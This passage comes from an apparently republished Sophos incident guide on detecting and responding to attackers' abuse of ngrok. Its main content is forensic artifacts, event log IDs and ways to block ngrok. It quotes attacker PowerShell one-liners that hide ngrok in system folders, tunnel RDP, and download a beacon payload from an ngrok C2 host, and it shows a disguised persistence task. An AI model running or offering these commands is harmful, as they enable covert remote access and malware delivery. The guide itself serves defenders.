BCX0\">DownloadFile<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">(&#8216;https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">ngrok<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">-stable-windows-386.zip&#8217;,&#8217;<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">ngrok.<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">zip&#8217;);Expand-Archive -Path &#8216;<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">ngrok.<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">zip&#8217; &#8211;<\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">DestinationPath<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\"> &#8216;C:WindowsSystem32<\/span><span class=\"NormalTextRun ContextualSpellingAndGrammarErrorV2Themed SCXW26240082 BCX0\">&#8216;;Start<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">-Process &#8211;<\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">nnw<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\"> &#8211;<\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">FilePath<\/span> <span class=\"NormalTextRun SCXW26240082 BCX0\">ngrok.<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">exe &#8211;<\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">ArgumentList<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\"> version <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">EngineVersion<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">=<\/span><\/span><span class=\"EOP SCXW26240082 BCX0\" data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<li>PowerShell invoking ngrok and adding TCP port bind to 3389\n<ul>\n<li>powershell.exe \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList &#8216;tcp 3389\u2019\n<ul>\n<li>PowerShell executes ngrok binary file and sets up TCP port on 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>PowerShell invokes ngrok API, using present port 4040\n<ul>\n<li>powershell.exe \/c (New-Object System.Net.WebClient).DownloadString(&#8216;http:\/\/127.0.0.1:4040\/api\/tunnels\u2019)<\/li>\n<\/ul>\n<\/li>\n<li>PowerShell invokes ngrok to communicate to a C2 server to retrieve malicious payload and write to disk\n<ul>\n<li>powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;http:\/\/2f65dfe21ccb.ngrok.io\/b3.exe&#8217;,&#8217;C:tmpbeacon.exe&#8217;)\n<ul>\n<li>PowerShell invokes web request for file retrieval\n<ul>\n<li>http &gt; Over web protocol 80<\/li>\n<li>2f65dfe21ccb &gt; subdomain assigned by ngrok service (with paid versions this can remain static and not dynamic)<\/li>\n<li>ngrok &gt; second-level domain for ngrok service<\/li>\n<li>.io &gt; Top-level domain<\/li>\n<li>b3.exe &gt; Payload to retrieve from attacker\u2019s webserver via ngrok<\/li>\n<li>C:tmpbeacon &gt; Write b3.exe to disk within this location\n<ul>\n<li>Based on the name only, this is a form of beacon<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><u>Incident Two<\/u><\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Wget invokes a web request to download an archive file containing an ngrok binary and performs an archive decompress. (Note: This was decoded from base64 SQB\u2026. Code)\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>IEX (New-Object Net.Webclient).DownloadString(&#8216;http:\/\/127.0.0.1:37448\/&#8217;);<br \/> [Net.ServicePointManager]::SecurityProtocol = &#8220;tls12, tls11, tls&#8221;;<br \/> [Net.ServicePointManager]::SecurityProtocol =<br \/> [Net.SecurityProtocolType]::Tls12 -bor<br \/> [Net.SecurityProtocolType]::Tls11 -bor<br \/> [Net.SecurityProtocolType]::Tls ; wget https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/ngrok-stable-windows-amd64.zip -Outfile C:WindowsTemps.zip ; Expand-Archive -Path C:WindowsTemps.zip -DestinationPath C:WindowsTemprk<\/li>\n<li>Cobalt Strike local host port Beacon bind assignment<\/li>\n<li>TLS versions covered to allow download operation to occur for whichever TLS version is present<\/li>\n<li>Web request to equinox.io domain to download ngrok\n<ul>\n<li>ngrok-stable-windows-amd64.zip<\/li>\n<\/ul>\n<\/li>\n<li>Output the archive file to disk at location:\n<ul>\n<li>C:WindowsTemp<\/li>\n<li>Name the archive file s.zip<\/li>\n<\/ul>\n<\/li>\n<li>Decompress the archive file to:\n<ul>\n<li>C:WindowsTemprk<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Scheduled task located which binds a pre-defined ngrok URL via the TCP protocol using port 3389\n<ul>\n<li><strong>Task name<\/strong> &gt; MicrosoftSync<\/li>\n<li><strong>Task action<\/strong> &gt; C:WindowsTemprkngrok.exe<\/li>\n<li><strong>Task argument<\/strong> &gt; tcp &#8211;region=us &#8211;remote-addr=3.tcp.ngrok.io:25126 3389\n<ul>\n<li><strong>Execute ngrok<\/strong> &gt; C:WindowsTemprkngrok.exe<\/li>\n<li><strong>Protocol to use<\/strong> &gt; TCP<\/li>\n<li><strong>Region select<\/strong> &gt; us<\/li>\n<li><strong>Remote address<\/strong> &gt; 3.tcp.ngrok.io:25126 3389\n<ul>\n<li>URL &gt; 3.tcp.ngrok.io<\/li>\n<li>Port &gt; 25126<\/li>\n<li>Protocol &gt; 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Task path<\/strong> &gt; C:Windowssystem32tasksMicrosoftWindowsMicrosoftSync.xml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Here, ngrok artifacts (based on ngrok TCP 3389 binding and payload retrieval via web protocols) were found. These are listed below along with their location. Values shown in green represent data that could be used to suggest ngrok presence \/ activity.<\/p>\n<ul>\n<li><b><span data-contrast=\"auto\"><u>File system<\/u><\/span><\/b>\n<ul>\n<li><strong>C:Users%.ngrok2ngrok.yml<\/strong>\n<ul>\n<li>This is the default location created by ngrok regarding the auth token import\n<ul>\n<li>ngrok.yml contents &gt; authotoken:2x51DsQKXfh5ktnL0QZoE02nP7V_378snElWViOptKDsXk8sM<\/li>\n<\/ul>\n<\/li>\n<li><strong>C:WindowsPrefetchNGROK.EXE%.pf<\/strong>\n<ul>\n<li>Svchost.exe created a prefetch file when ngrok was executed via a PowerShell start process<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong><u>Registry<\/u><\/strong>\n<ul>\n<li>SYSTEM HVE\n<ul>\n<li>HKLMSYSTEMControlSet001ControlSession ManagerAppCompatCache\n<ul>\n<li>Cache entry value &gt; C:UsersunknownDesktop<strong><span style=\"color: #99cc00\">ngrok.exe<\/span><\/strong>\n<ul>\n<li>Note:\n<ul>\n<li>If the binary name for ngrok didn\u2019t use the default naming string for the binary executable <span style=\"color: #000000\"><strong>ngrok.exe<\/strong><\/span>, it would render this artifact inconsequential, since the random substitute name that ngrok would be given by adversaries would not match<\/li>\n<li>This artifact can suggest several different types of events have occurred, and is not a reliable source for execution date \/ time stamps. However, if the default naming convention remains in use, this artifact could suggest the presence of ngrok<\/li>\n<li>Default inherent value will provide last modification time stamp for the binary executable<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong><u>Windows event logs<\/u><\/strong>\n<ul>\n<li><strong>Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx<\/strong>\n<ul>\n<li>Event ID 1149\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx\n<ul>\n<li>Event ID 21 (Logon succeeded)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials that differ from any currently logged on users with sessions<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Event ID 22 (Shell start notification)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials that differ from any currently logged on users with sessions<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Event ID 24 (Session has been disconnected)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<li>Event ID 25 (Session reconnection succeeded)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials that are currently logged on users with sessions, or a continuation from a disconnection via the same session\u2019s ID<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx<\/strong>\n<ul>\n<li>Event ID 131 (The server accepted a new TCP connection from client)\n<ul>\n<li>The server accepted a new TCP connection from client [<span style=\"color: #99cc00\"><strong>::1<\/strong><\/span>]:53645 (53645 represents a private port value assigned for the connection; this would be a non-static value)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Security.evtx<\/strong>\n<ul>\n<li>Event ID 4624 (account was successfully logged on)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::1<\/strong><\/span>\n<ul>\n<li>Note: ::1 &gt; IPV6 loopback address<\/li>\n<li>Logon Type: 10 (RDP)\n<ul>\n<li>Note: The two variables combined suggest an RDP logon-type connection has occurred, via a source address, loopback<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>Respond<\/h3>\n<p>Now that we have information derived from investigation and analysis, we can respond to an unwanted instance of ngrok and clean up the network\/endpoints, using Sophos Central (or other installed security solution and policies) to block the application. There are various ways to accomplish this.<\/p>\n<p>Sophos Central has a global block list by hash (although only versions of ngrok that have hashes added would be blocked).<\/p>\n<p>Microsoft AppLocker policies \/ rule sets concerning unsigned binaries can also be put in place to counter this, since the ngrok binary is currently not digitally signed.<\/p>\n<p>Mitigation can also be handled at the proxy servers or firewalls (if reviewing DNS requests \/ TLS decryption packet inspection). Although ngrok binaries can differ in name, hash, location, and so forth, the initial network communications to use ngrok\u2019s public infrastructure appear to be static. For example:<\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Top-level domain &gt; .io<\/li>\n<li>Second-level domain &gt; <span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>\n<ul>\n<li>This second-level domain remains static and could be used to block network traffic<\/li>\n<\/ul>\n<\/li>\n<li>Subdomain &gt; Random if using a free versions; other tiering allows for static domains<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Likewise, for DNS requests, a similar approach could be adopted to block ngrok traffic and identify which machines were initiating the DNS requests. Note that as shown in various instances above, ngrok uses multiple top-level domains (.com, .io):<\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Top-level domain &gt; .com<\/li>\n<li>Second-level domain &gt; <span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>\n<ul>\n<li>This second-level domain, which in our experience remains static, could be used to detect the network traffic request from the source host and block the network traffic. Although the subdomains also appear to be static, the detection \/ block would be cleaner using the second-level ngrok value, in case different regions were to provide alternate subdomains or some other form of differences<\/li>\n<\/ul>\n<\/li>\n<li>Subdomains &gt; tunnel.US<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Before restoring from backup, remember to check that your backups are also clean.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/07\/14\/rapid-response-the-ngrok-incident-guide\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/07\/122024889_m.jpg\"\/><\/p>\n<p><strong>Credit to Author: Angela Gunn| Date: Thu, 14 Jul 2022 08:01:51 +0000<\/strong><\/p>\n<p>Ngrok is a legitimate remote-access tool. It is regularly abused by attackers, who use its capabilities and reputation to maneuver while bypassing network protections. This incident guide shows Security Operations Centers (SOCs) and response teams how to detect and respond to the suspicious presence or use of ngrok on the network.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[12657,25274,24328,18513,16771],"class_list":["post-19594","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-incident-response","tag-mtrrapid-response","tag-ngrok","tag-sophoslabs-uncut","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19594"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19594\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19594"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}